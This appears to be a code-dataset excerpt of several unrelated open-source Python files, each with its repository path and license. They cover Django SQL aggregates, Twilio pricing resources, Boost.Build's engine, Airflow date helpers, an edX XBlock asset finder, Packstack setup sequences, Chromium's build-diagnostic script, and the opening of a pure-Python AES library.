sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| bsd-3-clause |
Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/twilio/rest/resources/pricing/phone_numbers.py | 35 | 2261 | from .. import NextGenInstanceResource, NextGenListResource
class PhoneNumbers(object):
"""Holds references to the Number pricing resources."""
name = "Number"
key = "Number"
def __init__(self, base_uri, auth, timeout):
self.uri = "%s/PhoneNumbers" % base_uri
self.countries = PhoneNumberCountries(self.uri, auth, timeout)
class PhoneNumberCountry(NextGenInstanceResource):
"""Pricing information for Twilio Phone Numbers in a specific country.
Twilio numbers are billed monthly, and the prices returned reflect
current Twilio list pricing before and after any discounts available for
the requesting account are applied.
.. attribute:: country
The full name of the country.
.. attribute:: iso_country
The country's 2-character ISO 3166-1 code.
.. attribute:: price_unit
The currency in which prices are measured, in ISO 4127 format
(e.g. 'usd', 'eur', 'jpy').
.. attribute:: phone_number_prices
A list of dicts containing pricing information as follows:
- type: "local", "mobile", "national", or "toll_free"
- base_price: the base price per month for this Twilio number type
- current_price: the current price per month (including discounts)
for this Twilio number type
"""
id_key = "iso_country"
class PhoneNumberCountries(NextGenListResource):
"""A list of countries where Twilio Phone Numbers are available.
The returned list of PhoneNumberCountry objects will not have pricing
information populated. To get pricing information for a specific country,
retrieve it with the :meth:`get` method.
"""
instance = PhoneNumberCountry
key = "countries"
name = "Countries"
def get(self, iso_country):
"""Retrieve pricing information for Twilio Numbers in the specified
country.
:param iso_country: The two-letter ISO code for the country
"""
return self.get_instance(iso_country)
def list(self):
"""Retrieve the list of countries in which Twilio Numbers are
available."""
resp, page = self.request("GET", self.uri)
return [self.load_instance(i) for i in page[self.key]]
| gpl-2.0 |
biospi/seamass-windeps | src/boost_1_57_0/tools/build/src/build/engine.py | 14 | 7374 | # Copyright Pedro Ferreira 2005.
# Copyright Vladimir Prus 2007.
# Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
bjam_interface = __import__('bjam')
import operator
import re
import b2.build.property_set as property_set
import b2.util
class BjamAction:
"""Class representing bjam action defined from Python."""
def __init__(self, action_name, function):
self.action_name = action_name
self.function = function
def __call__(self, targets, sources, property_set):
# Bjam actions defined from Python have only the command
# to execute, and no associated jam procedural code. So
# passing 'property_set' to it is not necessary.
bjam_interface.call("set-update-action", self.action_name,
targets, sources, [])
if self.function:
self.function(targets, sources, property_set)
class BjamNativeAction:
"""Class representing bjam action defined by Jam code.
We still allow to associate a Python callable that will
be called when this action is installed on any target.
"""
def __init__(self, action_name, function):
self.action_name = action_name
self.function = function
def __call__(self, targets, sources, property_set):
if self.function:
self.function(targets, sources, property_set)
p = []
if property_set:
p = property_set.raw()
b2.util.set_jam_action(self.action_name, targets, sources, p)
action_modifiers = {"updated": 0x01,
"together": 0x02,
"ignore": 0x04,
"quietly": 0x08,
"piecemeal": 0x10,
"existing": 0x20}
class Engine:
""" The abstract interface to a build engine.
For now, the naming of targets, and special handling of some
target variables like SEARCH and LOCATE make this class coupled
to bjam engine.
"""
def __init__ (self):
self.actions = {}
def add_dependency (self, targets, sources):
"""Adds a dependency from 'targets' to 'sources'
Both 'targets' and 'sources' can be either list
of target names, or a single target name.
"""
if isinstance (targets, str):
targets = [targets]
if isinstance (sources, str):
sources = [sources]
for target in targets:
for source in sources:
self.do_add_dependency (target, source)
def get_target_variable(self, targets, variable):
"""Gets the value of `variable` on set on the first target in `targets`.
Args:
targets (str or list): one or more targets to get the variable from.
variable (str): the name of the variable
Returns:
the value of `variable` set on `targets` (list)
Example:
>>> ENGINE = get_manager().engine()
>>> ENGINE.set_target_variable(targets, 'MY-VAR', 'Hello World')
>>> ENGINE.get_target_variable(targets, 'MY-VAR')
['Hello World']
Equivalent Jam code:
MY-VAR on $(targets) = "Hello World" ;
echo [ on $(targets) return $(MY-VAR) ] ;
"Hello World"
"""
return bjam_interface.call('get-target-variable', targets, variable)
def set_target_variable (self, targets, variable, value, append=0):
""" Sets a target variable.
The 'variable' will be available to bjam when it decides
where to generate targets, and will also be available to
updating rule for that 'taret'.
"""
if isinstance (targets, str):
targets = [targets]
for target in targets:
self.do_set_target_variable (target, variable, value, append)
def set_update_action (self, action_name, targets, sources, properties=property_set.empty()):
""" Binds a target to the corresponding update action.
If target needs to be updated, the action registered
with action_name will be used.
The 'action_name' must be previously registered by
either 'register_action' or 'register_bjam_action'
method.
"""
assert(isinstance(properties, property_set.PropertySet))
if isinstance (targets, str):
targets = [targets]
self.do_set_update_action (action_name, targets, sources, properties)
def register_action (self, action_name, command, bound_list = [], flags = [],
function = None):
"""Creates a new build engine action.
Creates on bjam side an action named 'action_name', with
'command' as the command to be executed, 'bound_variables'
naming the list of variables bound when the command is executed
and specified flag.
If 'function' is not None, it should be a callable taking three
parameters:
- targets
- sources
- instance of the property_set class
This function will be called by set_update_action, and can
set additional target variables.
"""
if self.actions.has_key(action_name):
raise "Bjam action %s is already defined" % action_name
assert(isinstance(flags, list))
bjam_flags = reduce(operator.or_,
(action_modifiers[flag] for flag in flags), 0)
# We allow command to be empty so that we can define 'action' as pure
# python function that would do some conditional logic and then relay
# to other actions.
assert command or function
if command:
bjam_interface.define_action(action_name, command, bound_list, bjam_flags)
self.actions[action_name] = BjamAction(action_name, function)
def register_bjam_action (self, action_name, function=None):
"""Informs self that 'action_name' is declared in bjam.
From this point, 'action_name' is a valid argument to the
set_update_action method. The action_name should be callable
in the global module of bjam.
"""
# We allow duplicate calls to this rule for the same
# action name. This way, jamfile rules that take action names
# can just register them without specially checking if
# action is already registered.
if not self.actions.has_key(action_name):
self.actions[action_name] = BjamNativeAction(action_name, function)
# Overridables
def do_set_update_action (self, action_name, targets, sources, property_set):
action = self.actions.get(action_name)
if not action:
raise Exception("No action %s was registered" % action_name)
action(targets, sources, property_set)
def do_set_target_variable (self, target, variable, value, append):
if append:
bjam_interface.call("set-target-variable", target, variable, value, "true")
else:
bjam_interface.call("set-target-variable", target, variable, value)
def do_add_dependency (self, target, source):
bjam_interface.call("DEPENDS", target, source)
| apache-2.0 |
sergiohgz/incubator-airflow | airflow/utils/dates.py | 4 | 9493 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from airflow.utils import timezone
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta # for doctest
import six
from croniter import croniter
cron_presets = {
'@hourly': '0 * * * *',
'@daily': '0 0 * * *',
'@weekly': '0 0 * * 0',
'@monthly': '0 0 1 * *',
'@yearly': '0 0 1 1 *',
}
def date_range(
start_date,
end_date=None,
num=None,
delta=None):
"""
Get a set of dates as a list based on a start, end and delta, delta
can be something that can be added to ``datetime.datetime``
or a cron expression as a ``str``
:param start_date: anchor date to start the series from
:type start_date: datetime.datetime
:param end_date: right boundary for the date range
:type end_date: datetime.datetime
:param num: alternatively to end_date, you can specify the number of
number of entries you want in the range. This number can be negative,
output will always be sorted regardless
:type num: int
>>> date_range(datetime(2016, 1, 1), datetime(2016, 1, 3), delta=timedelta(1))
[datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 1, 2, 0, 0),
datetime.datetime(2016, 1, 3, 0, 0)]
>>> date_range(datetime(2016, 1, 1), datetime(2016, 1, 3), delta='0 0 * * *')
[datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 1, 2, 0, 0),
datetime.datetime(2016, 1, 3, 0, 0)]
>>> date_range(datetime(2016, 1, 1), datetime(2016, 3, 3), delta="0 0 0 * *")
[datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 2, 1, 0, 0),
datetime.datetime(2016, 3, 1, 0, 0)]
"""
if not delta:
return []
if end_date and start_date > end_date:
raise Exception("Wait. start_date needs to be before end_date")
if end_date and num:
raise Exception("Wait. Either specify end_date OR num")
if not end_date and not num:
end_date = timezone.utcnow()
delta_iscron = False
tz = start_date.tzinfo
if isinstance(delta, six.string_types):
delta_iscron = True
start_date = timezone.make_naive(start_date, tz)
cron = croniter(delta, start_date)
elif isinstance(delta, timedelta):
delta = abs(delta)
dates = []
if end_date:
if timezone.is_naive(start_date):
end_date = timezone.make_naive(end_date, tz)
while start_date <= end_date:
if timezone.is_naive(start_date):
dates.append(timezone.make_aware(start_date, tz))
else:
dates.append(start_date)
if delta_iscron:
start_date = cron.get_next(datetime)
else:
start_date += delta
else:
for _ in range(abs(num)):
if timezone.is_naive(start_date):
dates.append(timezone.make_aware(start_date, tz))
else:
dates.append(start_date)
if delta_iscron:
if num > 0:
start_date = cron.get_next(datetime)
else:
start_date = cron.get_prev(datetime)
else:
if num > 0:
start_date += delta
else:
start_date -= delta
return sorted(dates)
def round_time(dt, delta, start_date=timezone.make_aware(datetime.min)):
"""
Returns the datetime of the form start_date + i * delta
which is closest to dt for any non-negative integer i.
Note that delta may be a datetime.timedelta or a dateutil.relativedelta
>>> round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
datetime.datetime(2015, 1, 1, 0, 0)
>>> round_time(datetime(2015, 1, 2), relativedelta(months=1))
datetime.datetime(2015, 1, 1, 0, 0)
>>> round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 16, 0, 0)
>>> round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 15, 0, 0)
>>> round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 14, 0, 0)
>>> round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
datetime.datetime(2015, 9, 14, 0, 0)
"""
if isinstance(delta, six.string_types):
# It's cron based, so it's easy
tz = start_date.tzinfo
start_date = timezone.make_naive(start_date, tz)
cron = croniter(delta, start_date)
prev = cron.get_prev(datetime)
if prev == start_date:
return timezone.make_aware(start_date, tz)
else:
return timezone.make_aware(prev, tz)
# Ignore the microseconds of dt
dt -= timedelta(microseconds=dt.microsecond)
# We are looking for a datetime in the form start_date + i * delta
# which is as close as possible to dt. Since delta could be a relative
# delta we don't know its exact length in seconds so we cannot rely on
# division to find i. Instead we employ a binary search algorithm, first
# finding an upper and lower limit and then disecting the interval until
# we have found the closest match.
# We first search an upper limit for i for which start_date + upper * delta
# exceeds dt.
upper = 1
while start_date + upper*delta < dt:
# To speed up finding an upper limit we grow this exponentially by a
# factor of 2
upper *= 2
# Since upper is the first value for which start_date + upper * delta
# exceeds dt, upper // 2 is below dt and therefore forms a lower limited
# for the i we are looking for
lower = upper // 2
# We now continue to intersect the interval between
# start_date + lower * delta and start_date + upper * delta
# until we find the closest value
while True:
# Invariant: start + lower * delta < dt <= start + upper * delta
# If start_date + (lower + 1)*delta exceeds dt, then either lower or
# lower+1 has to be the solution we are searching for
if start_date + (lower + 1)*delta >= dt:
# Check if start_date + (lower + 1)*delta or
# start_date + lower*delta is closer to dt and return the solution
if (
(start_date + (lower + 1) * delta) - dt <=
dt - (start_date + lower * delta)):
return start_date + (lower + 1)*delta
else:
return start_date + lower * delta
# We intersect the interval and either replace the lower or upper
# limit with the candidate
candidate = lower + (upper - lower) // 2
if start_date + candidate*delta >= dt:
upper = candidate
else:
lower = candidate
# in the special case when start_date > dt the search for upper will
# immediately stop for upper == 1 which results in lower = upper // 2 = 0
# and this function returns start_date.
def infer_time_unit(time_seconds_arr):
"""
Determine the most appropriate time unit for an array of time durations
specified in seconds.
e.g. 5400 seconds => 'minutes', 36000 seconds => 'hours'
"""
if len(time_seconds_arr) == 0:
return 'hours'
max_time_seconds = max(time_seconds_arr)
if max_time_seconds <= 60*2:
return 'seconds'
elif max_time_seconds <= 60*60*2:
return 'minutes'
elif max_time_seconds <= 24*60*60*2:
return 'hours'
else:
return 'days'
def scale_time_units(time_seconds_arr, unit):
"""
Convert an array of time durations in seconds to the specified time unit.
"""
if unit == 'minutes':
return list(map(lambda x: x*1.0/60, time_seconds_arr))
elif unit == 'hours':
return list(map(lambda x: x*1.0/(60*60), time_seconds_arr))
elif unit == 'days':
return list(map(lambda x: x*1.0/(24*60*60), time_seconds_arr))
return time_seconds_arr
def days_ago(n, hour=0, minute=0, second=0, microsecond=0):
"""
Get a datetime object representing `n` days ago. By default the time is
set to midnight.
"""
today = timezone.utcnow().replace(
hour=hour,
minute=minute,
second=second,
microsecond=microsecond)
return today - timedelta(days=n)
def parse_execution_date(execution_date_str):
"""
Parse execution date string to datetime object.
"""
return timezone.parse(execution_date_str)
| apache-2.0 |
waheedahmed/edx-platform | openedx/core/lib/xblock_pipeline/finder.py | 27 | 4672 | """
Django pipeline finder for handling static assets required by XBlocks.
"""
from datetime import datetime
import os
from pkg_resources import resource_exists, resource_listdir, resource_isdir, resource_filename
from xblock.core import XBlock
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.finders import BaseFinder
from django.contrib.staticfiles.storage import FileSystemStorage
from django.core.files.storage import Storage
class XBlockPackageStorage(Storage):
"""
Storage implementation for accessing XBlock package resources.
"""
RESOURCE_PREFIX = 'xblock/resources/'
def __init__(self, module, base_dir, *args, **kwargs):
"""
Returns a static file storage if available in the given app.
"""
super(XBlockPackageStorage, self).__init__(*args, **kwargs)
self.module = module
self.base_dir = base_dir
# Register a prefix that collectstatic will add to each path
self.prefix = os.path.join(self.RESOURCE_PREFIX, module)
def path(self, name):
"""
Returns a file system filename for the specified file name.
"""
return resource_filename(self.module, os.path.join(self.base_dir, name))
def exists(self, path):
"""
Returns True if the specified path exists.
"""
if self.base_dir is None:
return False
return resource_exists(self.module, os.path.join(self.base_dir, path))
def listdir(self, path):
"""
Lists the directories beneath the specified path.
"""
directories = []
files = []
for item in resource_listdir(self.module, os.path.join(self.base_dir, path)):
__, file_extension = os.path.splitext(item)
if file_extension not in [".py", ".pyc", ".scss"]:
if resource_isdir(self.module, os.path.join(self.base_dir, path, item)):
directories.append(item)
else:
files.append(item)
return directories, files
def open(self, name, mode='rb'):
"""
Retrieves the specified file from storage.
"""
path = self.path(name)
return FileSystemStorage(path).open(path, mode)
def size(self, name):
"""
Returns the size of the package resource.
"""
return os.path.getsize(self.path(name))
def accessed_time(self, name):
"""
Returns a URL to the package resource.
"""
return datetime.fromtimestamp(os.path.getatime(self.path(name)))
def created_time(self, name):
"""
Returns the created time of the package resource.
"""
return datetime.fromtimestamp(os.path.getctime(self.path(name)))
def modified_time(self, name):
"""
Returns the modified time of the resource.
"""
return datetime.fromtimestamp(os.path.getmtime(self.path(name)))
def url(self, name):
"""
Note: package resources do not support URLs
"""
raise NotImplementedError("Package resources do not support URLs")
def delete(self, name):
"""
Note: deleting files from a package is not supported.
"""
raise NotImplementedError("Deleting files from a package is not supported")
class XBlockPipelineFinder(BaseFinder):
"""
A static files finder that gets static assets from xblocks.
"""
def __init__(self, *args, **kwargs):
super(XBlockPipelineFinder, self).__init__(*args, **kwargs)
xblock_classes = set()
for __, xblock_class in XBlock.load_classes():
xblock_classes.add(xblock_class)
self.package_storages = [
XBlockPackageStorage(xblock_class.__module__, xblock_class.get_resources_dir())
for xblock_class in xblock_classes
]
def list(self, ignore_patterns):
"""
List all static files in all xblock packages.
"""
for storage in self.package_storages:
if storage.exists(''): # check if storage location exists
for path in utils.get_files(storage, ignore_patterns):
yield path, storage
def find(self, path, all=False): # pylint: disable=redefined-builtin
"""
Looks for files in the xblock package directories.
"""
matches = []
for storage in self.package_storages:
if storage.exists(path):
match = storage.path(path)
if not all:
return match
matches.append(match)
return matches
| agpl-3.0 |
openstack/packstack | packstack/installer/core/sequences.py | 6 | 3650 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Base class for steps & sequences
"""
import sys
import logging
import traceback
from .. import utils
from ..exceptions import SequenceError
class Step(object):
"""
Wrapper for function representing single setup step.
"""
def __init__(self, name, function, title=None):
self.name = name
self.title = title or ('Step: %s' % name)
# process step function
if function and not callable(function):
raise SequenceError("Function object have to be callable. "
"Object %s is not callable." % function)
self.function = function
def run(self, config=None, messages=None):
config = config if config is not None else {}
messages = messages if messages is not None else []
# TO-DO: complete logger name when logging will be setup correctly
logger = logging.getLogger()
logger.debug('Running step %s.' % self.name)
# execute and report state
try:
self.function(config, messages)
except Exception as ex:
logger.debug(traceback.format_exc())
state = utils.state_message(self.title, 'ERROR', 'red')
sys.stdout.write('%s\n' % state)
sys.stdout.flush()
raise
else:
state = utils.state_message(self.title, 'DONE', 'green')
sys.stdout.write('%s\n' % state)
sys.stdout.flush()
class Sequence(object):
"""
Wrapper for sequence of setup steps.
"""
def __init__(self, name, steps, title=None, condition=None,
cond_match=None):
self.name = name
self.title = title
self.condition = condition
self.cond_match = cond_match
# process sequence steps
self.steps = utils.SortedDict()
for step in steps:
name, func = step['name'], step['function']
self.steps[name] = Step(name, func, title=step.get('title'))
def validate_condition(self, config):
"""
Returns True if config option condition has value given
in cond_match. Otherwise returns False.
"""
if not self.condition:
return True
result = config.get(self.condition)
return result == self.cond_match
def run(self, config=None, messages=None, step=None):
"""
Runs sequence of steps. Runs only specific step if step's name
is given via 'step' parameter.
"""
config = config if config is not None else {}
messages = messages if messages is not None else []
if not self.validate_condition(config):
return
if step:
self.steps[step].run(config=config, messages=messages)
return
logger = logging.getLogger()
logger.debug('Running sequence %s.' % self.name)
if self.title:
sys.stdout.write('%s\n' % self.title)
sys.stdout.flush()
for step in self.steps.itervalues():
step.run(config=config, messages=messages)
| apache-2.0 |
havard024/prego | venv/lib/python2.7/site-packages/django/db/models/sql/aggregates.py | 195 | 3977 | """
Classes to represent the default SQL aggregate functions
"""
from django.db.models.fields import IntegerField, FloatField
# Fake fields used to identify aggregate types in data-conversion operations.
ordinal_aggregate_field = IntegerField()
computed_aggregate_field = FloatField()
class Aggregate(object):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
def relabel_aliases(self, change_map):
if isinstance(self.col, (list, tuple)):
self.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
def as_sql(self, qn, connection):
"Return the aggregate, rendered as SQL."
if hasattr(self.col, 'as_sql'):
field_name = self.col.as_sql(qn, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join([qn(c) for c in self.col])
else:
field_name = self.col
params = {
'function': self.sql_function,
'field': field_name
}
params.update(self.extra)
return self.sql_template % params
class Avg(Aggregate):
is_computed = True
sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct=distinct and 'DISTINCT ' or '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = sample and 'STDDEV_SAMP' or 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = sample and 'VAR_SAMP' or 'VAR_POP'
| mit |
XiaosongWei/chromium-crosswalk | tools/diagnose-me.py | 128 | 3534 | #!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Diagnose some common system configuration problems on Linux, and
suggest fixes."""
import os
import subprocess
import sys
all_checks = []
def Check(name):
"""Decorator that defines a diagnostic check."""
def wrap(func):
all_checks.append((name, func))
return func
return wrap
@Check("/usr/bin/ld is not gold")
def CheckSystemLd():
proc = subprocess.Popen(['/usr/bin/ld', '-v'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'GNU gold' in stdout:
return ("When /usr/bin/ld is gold, system updates can silently\n"
"corrupt your graphics drivers.\n"
"Try 'sudo apt-get remove binutils-gold'.\n")
return None
@Check("random lds are not in the $PATH")
def CheckPathLd():
proc = subprocess.Popen(['which', '-a', 'ld'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
instances = stdout.split()
if len(instances) > 1:
return ("You have multiple 'ld' binaries in your $PATH:\n"
+ '\n'.join(' - ' + i for i in instances) + "\n"
"You should delete all of them but your system one.\n"
"gold is hooked into your build via gyp.\n")
return None
@Check("/usr/bin/ld doesn't point to gold")
def CheckLocalGold():
# Check /usr/bin/ld* symlinks.
for path in ('ld.bfd', 'ld'):
path = '/usr/bin/' + path
try:
target = os.readlink(path)
except OSError, e:
if e.errno == 2:
continue # No such file
if e.errno == 22:
continue # Not a symlink
raise
if '/usr/local/gold' in target:
return ("%s is a symlink into /usr/local/gold.\n"
"It's difficult to make a recommendation, because you\n"
"probably set this up yourself. But you should make\n"
"/usr/bin/ld be the standard linker, which you likely\n"
"renamed /usr/bin/ld.bfd or something like that.\n" % path)
return None
@Check("random ninja binaries are not in the $PATH")
def CheckPathNinja():
proc = subprocess.Popen(['which', 'ninja'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if not 'depot_tools' in stdout:
return ("The ninja binary in your path isn't from depot_tools:\n"
+ " " + stdout +
"Remove custom ninjas from your path so that the one\n"
"in depot_tools is used.\n")
return None
@Check("build dependencies are satisfied")
def CheckBuildDeps():
script_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'build',
'install-build-deps.sh')
proc = subprocess.Popen([script_path, '--quick-check'],
stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'WARNING' in stdout:
return ("Your build dependencies are out-of-date.\n"
"Run '" + script_path + "' to update.")
return None
def RunChecks():
for name, check in all_checks:
sys.stdout.write("* Checking %s: " % name)
sys.stdout.flush()
error = check()
if not error:
print "ok"
else:
print "FAIL"
print error
if __name__ == '__main__':
RunChecks()
| bsd-3-clause |
mrquim/repository.mrquim | plugin.video.live.magellan/pyaesnew/aes.py | 177 | 60310 | # The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# This is a pure-Python implementation of the AES algorithm and AES common
# modes of operation.
# See: https://en.wikipedia.org/wiki/Advanced_Encryption_Standard
# Honestly, the best description of the modes of operations are the wonderful
# diagrams on Wikipedia. They explain in moments what my words could never
# achieve. Hence the inline documentation here is sparer than I'd prefer.
# See: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
# Also useful, PyCrypto, a crypto library implemented in C with Python bindings:
# https://www.dlitz.net/software/pycrypto/
# Supported key sizes:
# 128-bit
# 192-bit
# 256-bit
# Supported modes of operation:
# ECB - Electronic Codebook
# CBC - Cipher-Block Chaining
# CFB - Cipher Feedback
# OFB - Output Feedback
# CTR - Counter
# See the README.md for API details and general information.
import copy
import struct
__all__ = ["AES", "AESModeOfOperationCTR", "AESModeOfOperationCBC", "AESModeOfOperationCFB",
"AESModeOfOperationECB", "AESModeOfOperationOFB", "AESModesOfOperation", "Counter"]
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
return a + b
# Python 3 compatibility
try:
xrange
except Exception:
xrange = range
# Python 3 supports bytes, which is already an array of integers
def _string_to_bytes(text):
if isinstance(text, bytes):
return text
return [ord(c) for c in text]
# In Python 3, we return bytes
def _bytes_to_string(binary):
return bytes(binary)
# Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
def _concat_list(a, b):
return a + bytes(b)
# Based *largely* on the Rijndael implementation
# See: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [ 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91 ]
# S-box and Inverse S-box (S is for Substitution)
